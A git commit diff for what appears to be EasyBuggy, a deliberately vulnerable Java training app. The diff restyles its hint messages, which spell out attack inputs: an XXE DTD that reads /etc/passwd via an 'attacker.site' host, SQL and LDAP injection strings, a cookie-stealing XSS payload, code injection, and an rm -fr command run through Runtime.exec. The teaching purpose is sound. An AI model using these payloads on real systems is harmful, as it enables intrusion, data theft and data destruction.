Improve overall design

k-tamura · Apr 5, 2017 · 8143a3b · 8143a3b
1 parent 32ad3a1
commit 8143a3b
Show file tree

Hide file tree

Showing 8 changed files with 44 additions and 35 deletions.
diff --git a/src/main/java/org/t246osslab/easybuggy/core/utils/HTTPResponseCreator.java b/src/main/java/org/t246osslab/easybuggy/core/utils/HTTPResponseCreator.java
@@ -38,6 +38,7 @@ public static void createSimpleResponse(HttpServletResponse res, String htmlTitl
             writer.write("<link rel=\"stylesheet\" href=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css\" integrity=\"sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u\" crossorigin=\"anonymous\">");
             writer.write("<link rel=\"stylesheet\" href=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap-theme.min.css\" integrity=\"sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp\" crossorigin=\"anonymous\">");
             writer.write("<script src=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js\" integrity=\"sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa\" crossorigin=\"anonymous\"></script>");
+            writer.write("<script type=\"text/javascript\" src=\"https://google-code-prettify.googlecode.com/svn/loader/run_prettify.js\"></script>");
             writer.write("</HEAD>");
             writer.write("<BODY STYLE=\"margin:20px;\">" + htmlBody + "</BODY>");
             writer.write("</HTML>");

diff --git a/src/main/java/org/t246osslab/easybuggy/vulnerabilities/XEEandXXEServlet.java b/src/main/java/org/t246osslab/easybuggy/vulnerabilities/XEEandXXEServlet.java
@@ -55,14 +55,16 @@ protected void doGet(HttpServletRequest req, HttpServletResponse res) throws Ser
         }
         bodyHtml.append(MessageUtils.getMsg("msg.add.users.by.xml", locale));
         bodyHtml.append("<br><br>");
+        bodyHtml.append("<pre id=\"code\" class=\"prettyprint lang-xml\">");
         bodyHtml.append(ESAPI.encoder().encodeForHTML("<?xml version=\"1.0\"?>") + "<br>");
         bodyHtml.append(ESAPI.encoder().encodeForHTML("<users ou=\"ou=people,dc=t246osslab,dc=org\" >") + "<br>");
         bodyHtml.append(TAB + ESAPI.encoder()
                 .encodeForHTML("<user uid=\"user01\" phone=\"090-1234-5678\" mail=\"[email protected]\"/>") + "<br>");
         bodyHtml.append(TAB + ESAPI.encoder()
                 .encodeForHTML("<user uid=\"user02\" phone=\"090-9876-5432\" mail=\"[email protected]\">") + "<br>");
         bodyHtml.append(ESAPI.encoder().encodeForHTML("</users>"));
-        bodyHtml.append("<br><br>");
+        bodyHtml.append("</pre>");
+        bodyHtml.append("<br>");
         bodyHtml.append("<input type=\"file\" name=\"file\" size=\"60\" /><br>");
         bodyHtml.append(MessageUtils.getMsg("msg.select.upload.file", locale));
         bodyHtml.append("<br><br>");
@@ -75,6 +77,7 @@ protected void doGet(HttpServletRequest req, HttpServletResponse res) throws Ser
         if ("/xee".equals(req.getServletPath())) {
             bodyHtml.append(MessageUtils.getMsg("msg.note.xee", locale));
             bodyHtml.append("<br><br>");
+            bodyHtml.append("<pre id=\"code\" class=\"prettyprint lang-xml\">");
             bodyHtml.append(ESAPI.encoder().encodeForHTML("<?xml version=\"1.0\" encoding=\"UTF-8\" ?>") + "<br>");
             bodyHtml.append(ESAPI.encoder().encodeForHTML("<!DOCTYPE s[") + "<br>");
             bodyHtml.append(ESAPI.encoder().encodeForHTML("<!ENTITY x0 \"ha!\">") + "<br>");
@@ -95,21 +98,26 @@ protected void doGet(HttpServletRequest req, HttpServletResponse res) throws Ser
             bodyHtml.append(TAB + TAB + ESAPI.encoder().encodeForHTML("</ns1:reverse>") + "<br>");
             bodyHtml.append(TAB + ESAPI.encoder().encodeForHTML("</soapenv:Body>") + "<br>");
             bodyHtml.append(ESAPI.encoder().encodeForHTML("</soapenv:Envelope>") + "<br>");
+            bodyHtml.append("</pre>");
         } else {
             bodyHtml.append(MessageUtils.getMsg("msg.note.xxe.step1", locale));
             bodyHtml.append("<br><br>");
+            bodyHtml.append("<pre id=\"code\" class=\"prettyprint lang-xml\">");
             bodyHtml.append(ESAPI.encoder().encodeForHTML("<!ENTITY % p1 SYSTEM \"file:///etc/passwd\">") + "<br>");
             bodyHtml.append(
                     ESAPI.encoder().encodeForHTML("<!ENTITY % p2 \"<!ATTLIST users ou CDATA '%p1;'>\">") + "<br>");
             bodyHtml.append(ESAPI.encoder().encodeForHTML("%p2;"));
-            bodyHtml.append("<br><br>");
+            bodyHtml.append("</pre>");
+            bodyHtml.append("<br>");
             bodyHtml.append(MessageUtils.getMsg("msg.note.xxe.step2", locale));
             bodyHtml.append("<br><br>");
+            bodyHtml.append("<pre id=\"code\" class=\"prettyprint lang-xml\">");
             bodyHtml.append(ESAPI.encoder().encodeForHTML("<?xml version=\"1.0\"?>") + "<br>");
             bodyHtml.append(
                     ESAPI.encoder().encodeForHTML("<!DOCTYPE users SYSTEM \"http://attacker.site/vulnerable.dtd\" >")
                             + "<br>");
             bodyHtml.append(ESAPI.encoder().encodeForHTML("<users />"));
+            bodyHtml.append("</pre>");
         }
         bodyHtml.append("</form>");
         HTTPResponseCreator.createSimpleResponse(res, MessageUtils.getMsg("title.xxe", locale), bodyHtml.toString());

diff --git a/src/main/resources/messages_en.properties b/src/main/resources/messages_en.properties
@@ -5,7 +5,7 @@ description.endless.waiting=If you enter a character count, then a batch, includ
 description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown.
 description.random.string.generator=If you enter a character count, then a random characters of the count is created.
 description.reverse.name=If you enter your name, then the reversed name is shown.
-description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$.
+description.test.regular.expression=Please test if an input string matches the regular expression <code>^([a-z0-9]+[-]{0,1}){1,100}$</code>.
 description.send.mail=You can send a mail to the site administrator.
 label.available.characters=Available Characters
 label.asc=asc
@@ -55,7 +55,7 @@ msg.deadlock.occurs=A lock could not be obtained due to a deadlock.
 msg.download.file=You can download the following PDF files.
 msg.enter.json.string=Please enter JSON string.
 msg.enter.mail=Please enter your mail address.
-msg.enter.math.expression=Please enter a mathematical expression using java.lang.Math. For example, Math.sqrt(Math.pow(2, 6)) - 5
+msg.enter.math.expression=Please enter a mathematical expression using java.lang.Math. For example, <code>Math.sqrt(Math.pow(2, 6)) - 5</code>
 msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown.
 msg.enter.name=Please enter your name.
 msg.enter.passwd=If you enter a new password and click the submit button, then your password will be changed.
@@ -78,13 +78,13 @@ The number of login attempts is not limited on this page, so the brute force att
 msg.note.clickjacking=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
 This page receives a request that a user does not intend and changes the user's mail address.
 msg.note.code.injection=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
-If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection.
+If you enter <code>{}');java.lang.System.exit(0);//</code> , then JavaVM is forcibly finished due to code injection.
 msg.note.csrf=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
 This page receives a request that a user does not intend and changes the user's password.
 msg.note.dangerous.file.inclusion=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
-Change the query string to "template=[URL where malicious JSP file is deployed]", then a malicious code is executed.
+Change the query string to <code>template=[URL where malicious JSP file is deployed]</code>, then a malicious code is executed.
 msg.note.directory.traversal=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
-Change the query string to "?template=../WEB-INF/web.xml?", then you can see the content of web.xml in the source code of this page.
+Change the query string to <code>template=../WEB-INF/web.xml?</code>, then you can see the content of web.xml in the source code of this page.
 msg.note.enter.count=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
 If you enter a large character count, then an endless waiting process occurs.
 msg.note.enter.one=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
@@ -94,33 +94,33 @@ Truncation error occurs if you enter 3 or 7 or 9.
 msg.note.enter.decimal.value=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
 Loss of trailing digits occurs if you enter 0.0000000000000001.
 msg.note.enter.runtime.exec=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
-If you enter @java.lang.Runtime@getRuntime().exec('rm -fr /your-important-dir/'), then your important directory is removed on your server.
+If you enter <code>@java.lang.Runtime@getRuntime().exec('rm -fr /your-important-dir/')</code> , then your important directory is removed on your server.
 msg.note.not.use.ext.db=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
 Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS.
 msg.note.positive.number=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
 Integer overflow occurs if you enter a number greater than or equal to 63.
 msg.note.slow.regular.expression=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
-If you set string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds<br> \
-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If you set string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then ...
+If you set string to <code>aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042</code>, parse processing will take several tens of seconds<br> \
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If you set string to <code>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042</code>, then ...
 msg.note.slow.string.plus.operation=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
 If you set a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator.
 msg.note.sql.deadlock=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
 If you open two windows (or tabs) and select "asc" and click the "update" button on one windows immediately after you select "desc" \
 and click the "update" button on the other, then dead lock occurs in database.
 msg.note.sql.injection=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
-You can see other users information if you set password to "' OR '1'='1"
+You can see other users information if you set password to <code>' OR '1'='1</code>
 msg.note.ldap.injection=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
-You can see other users information if you set name to "*)(|(objectClass=*" and password to "aaaaaaa)"
+You can see other users information if you set name to <code>*)(|(objectClass=*" and password to "aaaaaaa)</code>
 msg.note.mail.header.injection=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
-If you change the subject field to textarea tag by browser's developer mode and set it to [subject][line break]Bcc: [a mail address], then you can send a mail to the address.
+If you change the subject field to textarea tag by browser's developer mode and set it to <code>[subject][line break]Bcc: [a mail address]</code>, then you can send a mail to the address.
 msg.note.mojibake=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
 Mojibake occurs if you set name in a multibyte language
 msg.note.null.byte.injection=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
-If using Java earlier than version 1.7.0_40 and you add ?fileName=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml.
+If using Java earlier than version 1.7.0_40 and you add <code>fileName=../WEB-INF/web.xml%00</code> to the query string, you can download a file which includes the content of web.xml.
 msg.note.open.redirect=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
-If you add goto=[an URL of a malicious site] to the query string, you can redirect to the malicious site.
+If you add <code>goto=[an URL of a malicious site]</code> to the query string, you can redirect to the malicious site.
 msg.note.unrestricted.ext.upload=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
-If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http://localhost:8080/uploadFiles/exit.jsp, \
+If you upload JSP file (named exit.jsp) including <code><% System.exit(0); %></code> and access to http://localhost:8080/uploadFiles/exit.jsp, \
 then JavaVM is forcibly finished.
 msg.note.unintended.file.disclosure=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
 If the directory listing feature works and you access to http://localhost:8080/uid/, then you can see the file list in the uid directory. \
@@ -132,7 +132,7 @@ It is easy to guess an account who can logs in since authentication error messag
 msg.note.xee=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
 If you upload the following file, it will waste server resource.
 msg.note.xss=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
-Session ID is shown if you set name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs<
+Session ID is shown if you set name to <code>>tpircs/<;)eikooc.tnemucod(trela>tpIrcs<</code>
 msg.note.xxe.step1=<span class="glyphicon glyphicon-info-sign"></span>&nbsp; \
 If you create the following DTD file on a web server that can be accessed by this server. For example, http://attacker.site/vulnerable.dtd
 msg.note.xxe.step2=and upload the following file, you can display password file (/etc/passwd) on the server.